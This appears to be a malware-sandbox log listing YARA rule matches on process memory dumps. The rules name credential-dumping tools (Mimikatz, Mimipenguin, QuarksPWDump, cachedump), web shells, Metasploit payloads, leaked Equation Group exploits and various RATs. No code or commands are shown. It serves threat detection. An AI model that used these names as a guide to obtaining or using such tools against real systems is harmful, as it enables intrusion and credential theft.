Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tools related to Operation Cloud Hopper Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Mimipenguin Password Extractor - Linux Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Word Dropper from Proofpoint FIN7 Report Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-WmiExec or Invoke-SmbExec Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-WmiExec or Invoke-SmbExec Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file WMImplant.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell script used in Operation Wilted Tulip Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a Windows scheduled task as used in Operation Wilted Tulip Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Compiled Impacket Tools Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file elgingamble Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file cmsd Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file eggbasket Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file sambal Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file envisioncollision Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file cmsex Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file DUL Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file slugger2 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file jackpop Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file estesfox Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool set Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects output generated by EQGRP scanner.exe Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects cloaked Mimikatz in VBS obfuscation Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects cloaked Mimikatz in JS obfuscation Author: Florian Roth
Source: 0000000A.00000003.322872020.0000000006854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files Shell [ci Author: unknown
Source: 00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php Author: Florian Roth
Source: 0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.464807403.0000000006D9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 Author: Florian Roth
Source: 0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Volgmer malware as reported in US CERT TA17-318B Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a process injection utility that can be used ofr good and bad purposes Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Lazarus malware from incident in Dec 2017 Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla Agent.BTZ Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malicious obfuscated VBS observed in February 2018 Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file Scan Copy.pdf.com Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware sample mentioned in the Silence report on Securelist Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a command to execute PowerShell from String Author: Florian Roth
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DLL implant, originally rights.dll and runs as a service Author: David Cannings
Source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files Shell [ci Author: unknown
Source: 00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file b37.php Author: Florian Roth
Source: 00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Volgmer malware as reported in US CERT TA17-318B Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a process injection utility that can be used ofr good and bad purposes Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Lazarus malware from incident in Dec 2017 Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla Agent.BTZ Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malicious obfuscated VBS observed in February 2018 Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file Scan Copy.pdf.com Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware sample mentioned in the Silence report on Securelist Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a command to execute PowerShell from String Author: Florian Roth
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DLL implant, originally rights.dll and runs as a service Author: David Cannings
Source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file PHP1.php Author: Florian Roth
Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file h4ntu shell [powered by tsoi Author: unknown
Source: 0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.sh Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-exe.vba Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.psh Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.aspx Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-cmd.ps1 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects PowerShell ISESteroids obfuscation Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Codoso APT CustomTCP Malware Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a malware sysdll.exe from the Rocket Kitten APT Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader - suspicious - Possible FP could be program crack Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects all QuarksPWDump versions Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file create_dns_injection.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file screamingplow.sh Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file MixText.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file tunnel_state_reader Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file payload.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file eligiblecandidate.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file BUSURPER-2211-724.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file networkProfiler_orderScans.sh Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file sniffer_xml2pcap Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file BananaAid Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file config_jp1_UA.pl Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file userscript.FW Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file BUSURPER-3001-724.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file workit.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file tinyhttp_setup.sh Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file EPBA.script Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file jetplow.sh Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file sploit.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file uninstallPBD.bat Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file BICECREAM-2140 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file BFLEA-2201.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file StoreFc.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files sploit.py, sploit.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - from files ssh.py, telnet.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - Extrabacon exploit output Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EQGRP Toolset Firewall - Unique strings Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file kerberoast.py Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects PlugX Malware Samples from June 2016 Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Venom Linux Rootkit Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects IronGate APT Malware - Step7ProSim DLL Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hack Deep Panda - lot1.tmp-pwdump Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EternalRocks Malware - file taskhost.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Linux hack tools - file a Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Linux Port Scanner Shark Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a tool used by APT groups - file pstgdump.exe Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a tool used by APT groups Author: Florian Roth
Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe Author: Florian Roth
